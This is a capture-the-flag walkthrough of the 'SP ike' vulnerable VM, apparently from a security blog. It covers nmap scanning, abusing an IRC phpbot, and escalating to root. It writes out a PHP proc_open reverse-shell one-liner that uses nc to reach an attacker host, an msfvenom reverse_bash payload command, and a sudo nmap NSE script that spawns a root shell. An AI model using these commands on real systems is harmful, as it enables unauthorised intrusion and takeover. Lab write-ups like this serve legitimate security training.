Hello friends! Today we are going to take another CTF challenge known as “SP ike”. The credit for making this VM machine goes to “Daniel Solstad”. Our goal is to get flags to complete the challenge.

Security Level: Intermediate

Penetrating Methodology:

• Discovering Targets IP
• Network scanning (Nmap)
• Surfing HTTP service port
• Configuring HEXCHAT IRC Client
• Connecting to IRC Server
• Creating PHP Malicious Script using MSFvenom
• Using Netcat Listener
• Spawning TTY Shell
• Getting Root Access
• Reading Final Flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our target –> 192.168.1.21

Time to scan the Target’s IP with nmap. Nmap scan result shows FOUR open ports, 80(http), 139(NetBIOS-ssn), 445(NetBIOS-ssn), 6667(IRC).

nmap -sV -T4 192.168.1.21

Since port 80 is running HTTP, so we thought of browsing Target’s IP in our browser. But it is not much of great help. Moving on.

Even directory scanning using dirb tool was not very useful. At last, we are left with the IRC chat server on port(6667). So, we used an IRC client Hexchat to connect to the port(6667). First, we need to configure Hexchat by Adding a New Profile and Editing Connection Details.

Now Edit the Network ike which we have added and Give the Target’s IP as you can see in the image.

We have successfully connected to the IRC Server. And we found something interesting that the server has a channel #php which has a phpbot, I guess it wouldn’t be a problem for the phpbot to execute a php script.

We created a msfvenom script to exploit the target machine. We used the reverse_netcat payload to create this script.

msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.34 lport=1234 R

After making a few tries, we finally able to execute our PHP script successfully. To get reverse shell execute the script given below.

!php $s=array(); $p=array(); proc_open("mkfifo /tmp/tsglu; nc 192.168.1.34 1234 0</tmp/tsglu | /bin/sh >/tmp/tsglu 2>&1; rm /tmp/tsglu", $s, $p);

Oh Yeah!! We got the reverse shell, but it is not a proper shell. We will spawn a tty shell using python. After doing sudo -l, we saw nmap can be used with root privileges. So to get root, we used commands given below and successfully got root access. Time to read the FLAG!!

nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
echo "os.execute('/bin/sh')" > /tmp/shell.nse
sudo nmap --script=/tmp/shell.nseid
cd /root
ls
cat flag.txt

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here